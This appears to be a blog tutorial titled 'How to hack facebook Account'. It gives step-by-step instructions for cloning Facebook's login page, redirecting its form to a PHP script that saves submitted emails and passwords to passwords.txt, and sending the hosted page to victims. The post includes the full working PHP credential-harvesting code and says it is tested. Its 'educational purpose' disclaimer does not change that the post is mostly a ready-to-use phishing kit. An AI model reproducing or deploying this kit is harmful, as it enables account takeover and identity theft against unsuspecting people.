How to hack facebook Account

No comments



Before creating a phishing page, you should first know what is phishing attack. Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging.

Here is a step by step guide will show you how you can make your own Facebook Phishing (Fake) page easily.


How to create a phishing page? 


Step 1 : Create a HTML page looks similar to Facebook homepage.

1. Go to the Facebook page ,and then right click on the page, u will see the option view page source, click on that.


2. Now a new tab will open which contain a source code. Copy and paste the complete code in notepad.


3. Now in that notepad and press CTRL+F,and type action="https:

4. You will have to find a text which looks like this action="https://www.facebook.com/login.php?login_attempt=1"

5. Now delete that part of code and change it to action="login.php" and save it as index.html.
Ex:   action="login.php"



Step 2: Create a PHP file


1. Open a new notepad copy the below code and paste it with name login.php.

<?php
header("Location: http://www.facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Step 3 : Create a empty .txt (notepad) file with name passwords.txt



Now you have three files 1) index.html ,  2) login.php and 3) passwords.txt.

Now here comes the method to get password and email address of the victim :


Now upload these files in any free server like 000webhosting , 1freehosting etc.. And now give the url of that page to your victim. And when your victim try to login in to it with the username and password , the page redirects to Facebook and you will see his email and password which was saved in passwords.txt file.

Or try yourself by installing any server like xampp or wampp server in your PC and run the index.html file via localhost to check it. I have tested the files which works 100%. Look at the below image to check it.


Note :  "Phishing" is identity theft. Attempted identity theft is still a crime. This tutorial is for educational purpose. Do at your own risk

No comments :

Post a Comment